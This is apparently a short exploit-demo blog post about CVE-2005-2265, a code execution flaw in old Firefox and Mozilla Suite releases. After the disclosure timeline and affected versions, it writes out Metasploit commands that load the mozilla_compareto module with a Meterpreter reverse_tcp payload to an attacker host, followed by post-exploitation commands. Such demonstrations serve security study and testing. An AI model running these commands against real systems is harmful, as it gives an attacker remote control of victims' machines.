aka wow on ZATAZ.com
CVE-2005-2265 : Mozilla Suite/Firefox InstallVersion compareTo() Code Execution
Timeline :
Vulnerability reported to the vendor by Aviv Raff the 2005-05-28
Version 1.0.5 of Mozilla Firefox & 1.7.10 of Mozilla Suite released the 2005-07-12
Vulnerability & PoC disclosure by Aviv Raff the 2005-07-13
PoC provided by :
hdm
Aviv Raff
Reference(s) :
Affected version(s) :
Mozilla Firefox previous version 1.0.5
Mozilla Suite previous version 1.7.10
Tested on Windows XP SP3 with :
Mozilla Firefox 1.0.4
Description :
This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit module is a direct port of Aviv Raff’s HTML PoC.
Commands :
use exploit/multi/browser/mozilla_compareto
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
sysinfo
getuid
ipconfig
I recommend you to read these related posts
- CVE-2010-3765 : Mozilla Firefox Interleaving document.write and appendChild Exploit
- CVE-2006-3677 : Mozilla Suite/Firefox Navigator Object Code Execution
- CVE-2011-2371 Mozilla Firefox Array.reduceRight() Integer Overflow Metasploit Demo
- CVE-2011-0073 : Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability
- CVE-2011-0065 : Mozilla Firefox mChannel use after free vulnerability Metasploit Demo
- CVE-2011-3658 Firefox 7/8 nsSVGValue Vulnerability Metasploit Demo
- CVE-2011-3659 Firefox 8/9 AttributeChildRemoved() Use-After-Free Metasploit Demo
- Mozilla Firefox Bootstrapped Add-on Social Engineering Code Execution Metasploit Demo
- Fraudulent TURKTRUST Digital Certificat Used In Active Attacks
- EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation
